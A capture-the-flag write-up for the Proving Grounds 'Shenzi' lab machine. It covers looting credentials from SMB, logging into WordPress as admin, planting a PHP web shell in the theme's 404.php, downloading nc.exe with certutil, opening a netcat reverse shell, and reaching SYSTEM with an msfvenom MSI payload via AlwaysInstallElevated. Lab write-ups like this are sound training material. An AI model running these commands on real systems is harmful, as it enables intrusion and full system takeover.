Shenzi

Writeup for Shenzi from offsec Proving Grounds

Information Gathering

sudo ./nmapAutomator.sh 192.168.85.55 all

Service Enumeration

SMB (Port 445)

We can list what to see what Sharenames there are.

We can then download all the files to see if there are anything useful.

Passwords.txt contains many credentials which we can save for later.

Notice that there are WordPress credentials. We can thus run gobuster on the webserver to see if there are any interesting directories.

HTTP (Port 80)

It looks like a basic XAMPP server.

We can run gobuster.

There is a phpmyadmin directory but we can't really access it.

After more digging and clever brute-forcing, I tried /Shenzi directory and we get this page.

Since we know this is a WordPress site, we can try the /wp-admin/ directory and we get this login page.

From our earlier enumeration of SMB service, we know that the login credentials are admin:FeltHeadwallWight357. We try using these credentials, and we are authenticated.

Exploit

Here, we can navigate toTheme Editor under the Appearance tab. In this tab, we are able to modify PHP code.

We copy and paste the source code from here, https://github.com/artyuum/Simple-PHP-Web-Shell/blob/master/index.php, to the 404.php file. This would allow us to have access to a web shell whenever we get a 404 error on this site, or if we navigate to 404.php.

Then, we navigate to /404.php or any other directory that doesn't exist, and we get our web shell.

Next, let's transfer nc.exe to the target machine so that we can use it to gain a reverse shell.

cmd.exe /c certutil -urlcache -split -f http://192.168.49.85:80/opt/windows_nc/nc.exe nc.exe

Next, let's get a reverse shell.

We use the following command in our PHP Web Shell:

nc.exe -e cmd 192.168.49.85 443

Privesc

Next, we can transfer winPEAS onto the target machine and run it.

From winPEAS, we notice these 2 registers are enabled (value is 0x1). This means users of any privilege can install (execute) *.msi files as NT AUTHORITY\SYSTEM.

Credits - https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#alwaysinstallelevated

Let's generate a .msi reverse shell file first.

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.49.85 LPORT=21 -f msi > ~/pg/shenzi/shell.msi

After transferring the file and running it, we get SYSTEM.

PreviousJackoNextLinux

Last updated